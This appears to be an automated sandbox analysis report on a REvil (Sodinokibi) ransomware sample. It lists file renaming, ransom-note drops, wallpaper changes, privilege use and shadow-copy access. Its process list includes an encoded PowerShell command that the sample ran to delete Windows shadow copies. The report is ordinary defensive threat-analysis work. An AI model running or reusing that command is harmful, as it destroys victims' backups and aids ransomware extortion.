Analysis Overview
SHA256: 740ad8ea62f10de39e0b794cf6f579f25af1b8d79f859b48ecd41edc1f92cf13
Threat Level: Known bad
The file Revil.bin.zip was found to be: Known bad.
Malicious Activity Summary
Sodin, Sodinokibi, REvil
Modifies extensions of user files
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies registry class
Uses Volume Shadow Copy service COM API
Analysis: static1
Detonation Overview
Reported
2023-06-02 12:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-06-02 12:26
Reported
2023-06-02 12:28
Platform
win10v2004-20230220-en
Max time kernel
120s
Max time network
128s
Signatures
Sodin, Sodinokibi, REvil
Modifies extensions of user files
| Description | Indicator | Process | Target |
|---|---|---|---|
| File renamed | C:\Users\Admin\Pictures\GroupEnter.tif => \??\c:\users\admin\pictures\GroupEnter.tif.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnblockSearch.crw => \??\c:\users\admin\pictures\UnblockSearch.crw.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CopyRestart.crw => \??\c:\users\admin\pictures\CopyRestart.crw.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnterReceive.crw => \??\c:\users\admin\pictures\EnterReceive.crw.emd4l3g7 | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
Enumerates connected drives
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\du8nxx.bmp" | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | \??\c:\program files\ShowRegister.html | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\UnregisterUnlock.DVR-MS | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File created | \??\c:\program files\EDGEWATER-README.txt | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\ClearGrant.css | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\EnableAssert.jpg | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\ReceiveDisable.pdf | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\StopComplete.kix | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\UnblockMerge.tiff | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\UndoRead.3gp | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File created | \??\c:\program files (x86)\EDGEWATER-README.txt | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\DisableExpand.iso | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\ProtectRedo.xhtml | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| File opened for modification | \??\c:\program files\StopAdd.ex_ | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Revil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Revil.exe
"C:\Users\Admin\AppData\Local\Temp\Revil.exe"
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\EDGEWATER-README.txt
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
Network
Files